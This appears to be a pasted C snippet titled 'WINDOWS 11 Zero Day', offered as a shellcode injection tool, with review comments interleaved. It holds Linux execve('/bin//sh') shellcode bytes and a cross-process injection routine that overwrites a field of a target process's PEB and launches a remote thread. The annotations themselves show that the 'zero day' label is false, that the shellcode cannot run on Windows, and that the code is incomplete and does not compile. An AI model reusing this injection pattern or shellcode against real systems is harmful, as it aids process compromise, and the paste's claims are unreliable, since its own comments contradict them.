Sweetening

WINDOWS 11 Zero Day

Apr 8th, 2024
  1. #include <windows.h>
  2. #include <stdio.h>
  3. #include <tlhelp32.h>
  4. #include <winternl.h> // For PEB
  5.  
  6. #pragma comment(lib, "ntdll.lib")
  7. #pragma comment(lib, "kernel32.lib")
  8.  
/*
 * Payload bytes carried by the paste.
 *
 * Decoding the bytes as they appear here: xor rax,rax / add rax,0x3b /
 * xor rdi,rdi / push rdi / mov rdi,"/bin//sh" / push rdi / lea rdi,[rsp] /
 * xor rsi,rsi / xor rdx,rdx / syscall. That is the textbook Linux x86-64
 * execve("/bin//sh") stub (the string "/bin//sh" is visible inline as
 * 2f 62 69 6e 2f 2f 73 68). It is not Windows code: a Windows process has no
 * Linux syscall interface, so executing it there faults rather than doing
 * anything useful. This undercuts the "Windows 11 zero day" framing of the
 * paste.
 *
 * Storing it as `const char*` discards the length (the stub contains no
 * embedded NUL, but strlen-based sizing is fragile for binary data).
 * `shellcode` is not referenced by any visible line of InjectShellCode or
 * main; if it is used at all, that happens in the elided "previous code".
 */
const char* shellcode =
"\x48\x31\xc0\x48\x83\xc0\x3b\x48\x31\xff\x57\x48\xbf\x2f\x62\x69\x6e"
"\x2f\x2f\x73\x68\x57\x48\x8d\x3c\x24\x48\x31\xf6\x48\x31\xd2\x0f\x05";
  12.  
/*
 * Writes a modified PEB into a target process and starts a remote thread
 * there. This is the classic cross-process injection API sequence
 * (ReadProcessMemory / WriteProcessMemory / CreateRemoteThread on a handle to
 * another process), which is exactly the sequence EDR and ETW-based
 * detections are built around; nothing visible here is Windows-11-specific or
 * exploits a vulnerability.
 *
 * Only part of the function is present: hProcess, pPebAddress,
 * pRemoteShellcode and pFunction are used but declared in the elided
 * "previous code", presumably after an OpenProcess with write/thread-creation
 * rights on the target (TODO confirm from the elided part). None of the three
 * parameters (pid, moduleName, functionSymbol) is used in the visible body.
 *
 * Returns FALSE when a Win32 call fails, TRUE once the remote thread has
 * exited; the thread's own exit status is never inspected, so TRUE does not
 * mean the thread did anything.
 *
 * NOTE(review): on every error path and in the final cleanup, CloseHandle
 * (hProcess) runs before VirtualFreeEx(hProcess, ...), so the release call is
 * made on an already-closed handle and its result is ignored.
 * NOTE(review): GetLastError() returns a DWORD; "%d" expects int ("%lu"
 * would match).
 */
BOOL InjectShellCode(DWORD pid, const char* moduleName, const char* functionSymbol) {
// ... (previous code)

// Modify the atom table of the ntdll.dll module in the target process
// Reads sizeof(PEB) bytes from pPebAddress in the target into a local copy.
PEB peb = { 0 };
if (!ReadProcessMemory(hProcess, pPebAddress, &peb, sizeof(peb), NULL)) {
printf("Failed to read the PEB of the target process (error: %d)\n", GetLastError());
CloseHandle(hProcess);
VirtualFreeEx(hProcess, pRemoteShellcode, 0, MEM_RELEASE);
return FALSE;
}

// Replace the atom table of the target process
// NOTE(review): the field written is GdiSharedHandleTable, which by name is
// not an atom table; the comment and the code disagree. What the target does
// with this field afterwards is not established anywhere in the paste.
peb.GdiSharedHandleTable = (ULONG_PTR)pRemoteShellcode;

// Writes the whole modified PEB copy back over the target's PEB.
if (!WriteProcessMemory(hProcess, pPebAddress, &peb, sizeof(peb), NULL)) {
printf("Failed to modify the PEB of the target process (error: %d)\n", GetLastError());
CloseHandle(hProcess);
VirtualFreeEx(hProcess, pRemoteShellcode, 0, MEM_RELEASE);
return FALSE;
}

// Create a thread in the target process to execute the shellcode
// The thread start address is pFunction (from the elided code), with a NULL
// argument; pRemoteShellcode is not the start address here.
HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pFunction, NULL, 0, NULL);
if (hThread == NULL) {
printf("Failed to create remote thread in the target process (error: %d)\n", GetLastError());
CloseHandle(hProcess);
VirtualFreeEx(hProcess, pRemoteShellcode, 0, MEM_RELEASE);
return FALSE;
}

// Wait for the thread to finish
// Blocks without a timeout; a thread that never exits hangs the caller.
WaitForSingleObject(hThread, INFINITE);

// Clean up
// NOTE(review): hProcess is closed one line before it is passed to VirtualFreeEx.
CloseHandle(hThread);
CloseHandle(hProcess);
VirtualFreeEx(hProcess, pRemoteShellcode, 0, MEM_RELEASE);

return TRUE;
}
  54.  
/*
 * Entry point of the paste's sketch. As pasted it does not compile: the
 * `...` initializers are placeholders, not C, and the "previous code" is
 * elided. moduleName and functionSymbol are passed through to
 * InjectShellCode, whose visible body does not use them.
 *
 * Always returns 0, so the process exit status does not reflect the
 * success/failure branch below; only the printed message does.
 */
int main() {
DWORD targetPID = ...; // The target process PID
const char* moduleName = "..."; // Module name
const char* functionSymbol = "..."; // Function symbol

// ... (previous code)

BOOL success = InjectShellCode(targetPID, moduleName, functionSymbol);
if (success) {
printf("Shellcode injection successful!\n");
} else {
printf("Shellcode injection failed!\n");
}

// Exit status is 0 on both branches.
return 0;
}